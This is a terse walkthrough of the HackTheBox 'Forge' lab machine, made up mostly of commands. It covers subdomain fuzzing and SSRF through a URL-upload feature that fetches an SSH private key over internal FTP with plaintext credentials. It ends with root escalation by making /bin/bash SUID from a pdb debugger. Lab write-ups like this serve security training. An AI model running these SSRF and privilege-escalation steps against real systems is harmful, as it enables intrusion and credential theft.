HackTheBox – Forge Walkthrough
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.111
┌──(rootkali)-[/home/kali/Downloads]
└─# cp /usr/share/laudanum/php/php-reverse-shell.php test1.php
http://forge.htb/uploads/Fn1T9NPtQKBZ9yeDNhQ1
┌──(rootkali)-[/home/kali/Downloads]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt -u http://forge.htb/ -H “Host: FUZZ.forge.htb” -t 200 -fl 10
┌──(rootkali)-[/home/kali/Downloads]
└─# curl http://forge.htb/uploads/zpEV4OW89xN8btm6wm0F
I got a folder named “ announcements” lets append this again in the URL upload, then your upload URL would look like :http://ADMIN.FORGE.HTB/announcements
┌──(rootkali)-[/home/kali/Downloads]
└─# curl http://forge.htb/uploads/6y4WUK66VfUqa3jsGg5C
I got some useful info including ftp creds and the scripting method to upload img.
Tried the method to access ftp and its folder by again submitting URL by using URL upload method, below is the link I used to upload:
http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@127.0.1.1/
┌──(rootkali)-[/home/kali/Downloads]
└─# curl http://forge.htb/uploads/ApWCvb75cjvtTFI37syO
http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@127.1.1.1/.ssh/id_rsa
┌──(rootkali)-[/home/kali/Downloads]
└─# curl http://forge.htb/uploads/jJYhT1sBxieg2C7RCOxb
┌──(rootkali)-[/home/kali/Downloads]
└─# chmod 600 id_rsa
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh -i id_rsa user@10.10.11.111
user@forge:~$ id
user@forge:~$ cd /home
user@forge:/home$ ls –lrt
user@forge:/home$ cd user
user@forge:~$ cat user.txt
user@forge:~$ sudo –l
user@forge:~$ cat /opt/remote-manage.py
Open another session
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh -i id_rsa user@10.10.11.111
user@forge:~$ sudo /usr/bin/python3 /opt/remote-manage.py
Just open another terminal connect to ssh and try connecting to that port using nc , if you’ve done it correct you must get selection option, similar to below image. Now exceeding the length so that it could enter the pdb debugger.
user@forge:~$ nc localhost 43560
password: secretadminpassword
Now you get the PDB shell
Its time to escalate privilege, type below commands:
(Pdb) import os
(Pdb) os.system (‘chmod u+s /bin/bash’)
(Pdb) exit
user@forge:~$ /bin/bash -p
bash-5.0# id
bash-5.0# cd /root
bash-5.0# cat root.txt